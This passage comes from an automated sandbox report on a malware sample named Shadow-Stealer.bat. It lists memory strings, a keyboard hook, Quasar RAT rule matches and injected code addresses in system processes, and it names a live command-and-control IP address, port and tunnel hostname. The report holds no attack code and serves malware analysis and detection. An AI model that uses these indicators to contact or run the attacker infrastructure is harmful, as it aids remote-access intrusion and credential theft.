            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: lsass.exe, 00000018.00000000.2485971578.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3366282743.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3364189171.000002D6F0C45000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485797316.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: lsass.exe, 00000018.00000002.3364189171.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485797316.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
            Source: lsass.exe, 00000018.00000000.2485644679.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361810056.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
            Source: lsass.exe, 00000018.00000000.2485971578.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3366282743.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3367690216.000002D6F0E11000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3365446317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486093727.000002D6F0E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3364189171.000002D6F0C45000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485797316.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485919317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
            Source: lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: lsass.exe, 00000018.00000000.2486056808.000002D6F0DCD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.c
            Source: lsass.exe, 00000018.00000000.2485919317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
            Source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABC7D1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000013.00000002.3357613110.000001F58009C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: lsass.exe, 00000018.00000000.2485644679.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361810056.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, cscript.exe, 0000001C.00000002.3371306184.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001C.00000000.2515366668.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
            Source: $sxr-powershell.exe, 00000013.00000002.3357613110.000001F58004F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
            Source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABC7D1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000013.00000002.3357613110.000001F580074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
            Source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCFF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
            Source: unknownDNS traffic detected: queries for: throbbing-mountain-09011.pktriot.net
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Windows\$sxr-powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\$sxr-powershell.exeJump to behavior

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: Process Memory Space: $sxr-powershell.exe PID: 6400, type: MEMORYSTR

            System Summary

            barindex
            Source: 15.2.$sxr-powershell.exe.1facd584ef8.29.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
            Source: 15.2.$sxr-powershell.exe.1facd584ef8.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
            Source: 0000000F.00000002.3570248897.000001FACD23D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
            Source: Shadow-Stealer.batStatic file information: 13144733
            Source: C:\Windows\$sxr-powershell.exeNetwork Connect: 167.71.56.116 22112Jump to behavior
            Source: C:\Windows\$sxr-cmd.exeProcess created: Commandline size = 7207
            Source: C:\Windows\$sxr-powershell.exeProcess created: Commandline size = 7313
            Source: C:\Windows\$sxr-cmd.exeProcess created: Commandline size = 7207Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: Commandline size = 7313Jump to behavior
            Source: C:\Windows\System32\dllhost.exeCode function: 8_2_00000001400013688_2_0000000140001368
            Source: C:\Windows\System32\dllhost.exeCode function: 8_2_00000001400010148_2_0000000140001014
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACE900217810_2_000001ACE9002178
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACE900B0D010_2_000001ACE900B0D0
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACE900F39810_2_000001ACE900F398
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACE900B2DC10_2_000001ACE900B2DC
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACE90116F810_2_000001ACE90116F8
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2DBEDC10_2_000001ACEA2DBEDC
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2E22F810_2_000001ACEA2E22F8
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2DFF9810_2_000001ACEA2DFF98
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2DBCD010_2_000001ACEA2DBCD0
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2D2D7810_2_000001ACEA2D2D78
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_00007FF64E1D100810_2_00007FF64E1D1008
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A58217813_2_000002155A582178
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A58B2DC13_2_000002155A58B2DC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5916F813_2_000002155A5916F8
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A58F39813_2_000002155A58F398
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A58B0D013_2_000002155A58B0D0
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5B2D7813_2_000002155A5B2D78
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5BBEDC13_2_000002155A5BBEDC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5C22F813_2_000002155A5C22F8
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5BFF9813_2_000002155A5BFF98
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5BBCD013_2_000002155A5BBCD0
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F37D813_2_00007FF7137F37D8
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F422413_2_00007FF7137F4224
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137EAA5413_2_00007FF7137EAA54
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F0A6C13_2_00007FF7137F0A6C
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F555413_2_00007FF7137F5554
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F18D413_2_00007FF7137F18D4
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137EB0D813_2_00007FF7137EB0D8
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E851013_2_00007FF7137E8510
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF71380AC4C13_2_00007FF71380AC4C
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F785413_2_00007FF7137F7854
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E2C4813_2_00007FF7137E2C48
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E188413_2_00007FF7137E1884
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF71380AFBC13_2_00007FF71380AFBC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E6BE013_2_00007FF7137E6BE0
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E341013_2_00007FF7137E3410
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E372C13_2_00007FF7137E372C
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E9B5013_2_00007FF7137E9B50
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E5B7013_2_00007FF7137E5B70
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E3F9013_2_00007FF7137E3F90
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E6EE413_2_00007FF7137E6EE4
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF713807F0013_2_00007FF713807F00
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E222013_2_00007FF7137E2220
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF71380AA3013_2_00007FF71380AA30
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E4A3013_2_00007FF7137E4A30
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E524013_2_00007FF7137E5240
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E765013_2_00007FF7137E7650
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137ED25013_2_00007FF7137ED250
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E9E5013_2_00007FF7137E9E50
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF71380EE8813_2_00007FF71380EE88
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137EE68013_2_00007FF7137EE680
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF71380D9D013_2_00007FF71380D9D0
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E81D413_2_00007FF7137E81D4
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E8DF813_2_00007FF7137E8DF8
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137ECE1013_2_00007FF7137ECE10
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E7D3013_2_00007FF7137E7D30
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF71381153813_2_00007FF713811538
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC4B0D019_2_000001F5FDC4B0D0
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC4F39819_2_000001F5FDC4F398
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC4B2DC19_2_000001F5FDC4B2DC
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC516F819_2_000001F5FDC516F8
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC4217819_2_000001F5FDC42178
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC7BCD019_2_000001F5FDC7BCD0
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC7FF9819_2_000001F5FDC7FF98
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC7BEDC19_2_000001F5FDC7BEDC
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC822F819_2_000001F5FDC822F8
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC72D7819_2_000001F5FDC72D78
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_00007FFD348A3A7719_2_00007FFD348A3A77
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_00007FFD348A30F219_2_00007FFD348A30F2
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_00007FFD348A35F219_2_00007FFD348A35F2
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_00007FFD348A3D9819_2_00007FFD348A3D98
            Source: C:\Windows\System32\dllhost.exeCode function: 20_2_0000000140001B3020_2_0000000140001B30
            Source: C:\Windows\System32\dllhost.exeCode function: 20_2_000000014000119C20_2_000000014000119C
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01658B2DC22_2_000002D01658B2DC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165916F822_2_000002D0165916F8
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01658F39822_2_000002D01658F398
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01658B0D022_2_000002D01658B0D0
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01658217822_2_000002D016582178
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165EBEDC22_2_000002D0165EBEDC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165F22F822_2_000002D0165F22F8
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165EFF9822_2_000002D0165EFF98
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165EBCD022_2_000002D0165EBCD0
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165E2D7822_2_000002D0165E2D78
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0166216F822_2_000002D0166216F8
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01661B2DC22_2_000002D01661B2DC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01661F39822_2_000002D01661F398
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01661B0D022_2_000002D01661B0D0
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01661217822_2_000002D016612178
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0166816F822_2_000002D0166816F8
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01667B2DC22_2_000002D01667B2DC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01667F39822_2_000002D01667F398
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01667B0D022_2_000002D01667B0D0
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01667217822_2_000002D016672178
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0166E16F822_2_000002D0166E16F8
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0166DB2DC22_2_000002D0166DB2DC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0166DF39822_2_000002D0166DF398
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0166DB0D022_2_000002D0166DB0D0
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0166D217822_2_000002D0166D2178
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0167416F822_2_000002D0167416F8
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01673B2DC22_2_000002D01673B2DC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01673F39822_2_000002D01673F398
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01673B0D022_2_000002D01673B0D0
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01673217822_2_000002D016732178
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0167A16F822_2_000002D0167A16F8
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01679B2DC22_2_000002D01679B2DC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01679F39822_2_000002D01679F398
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01679B0D022_2_000002D01679B0D0
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01679217822_2_000002D016792178
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F14E217824_2_000002D6F14E2178
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F14EB0D024_2_000002D6F14EB0D0
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F14EF39824_2_000002D6F14EF398
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F14EB2DC24_2_000002D6F14EB2DC
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F14F16F824_2_000002D6F14F16F8
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F1512D7824_2_000002D6F1512D78
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F151BCD024_2_000002D6F151BCD0
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F151FF9824_2_000002D6F151FF98
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F151BEDC24_2_000002D6F151BEDC
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F15222F824_2_000002D6F15222F8
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FA217825_2_0000014E41FA2178
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FAB0D025_2_0000014E41FAB0D0
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FAF39825_2_0000014E41FAF398
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FB16F825_2_0000014E41FB16F8
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FAB2DC25_2_0000014E41FAB2DC
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FD2D7825_2_0000014E41FD2D78
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FDBCD025_2_0000014E41FDBCD0
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FDFF9825_2_0000014E41FDFF98
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FE22F825_2_0000014E41FE22F8
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FDBEDC25_2_0000014E41FDBEDC
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B4716F826_2_000001D15B4716F8
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B46B2DC26_2_000001D15B46B2DC
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B46F39826_2_000001D15B46F398
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B46B0D026_2_000001D15B46B0D0
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B46217826_2_000001D15B462178
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B4A22F826_2_000001D15B4A22F8
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B49BEDC26_2_000001D15B49BEDC
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B49FF9826_2_000001D15B49FF98
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B49BCD026_2_000001D15B49BCD0
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B492D7826_2_000001D15B492D78
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CAD217826_2_000001D15CAD2178
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CADB0D026_2_000001D15CADB0D0
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CADF39826_2_000001D15CADF398
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CADB2DC26_2_000001D15CADB2DC
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CAE16F826_2_000001D15CAE16F8
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CB3217826_2_000001D15CB32178
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CB3B0D026_2_000001D15CB3B0D0
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CB3F39826_2_000001D15CB3F398
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CB3B2DC26_2_000001D15CB3B2DC
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CB416F826_2_000001D15CB416F8
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CB9217826_2_000001D15CB92178
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CB9B0D026_2_000001D15CB9B0D0
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CB9F39826_2_000001D15CB9F398
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CB9B2DC26_2_000001D15CB9B2DC
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CBA16F826_2_000001D15CBA16F8
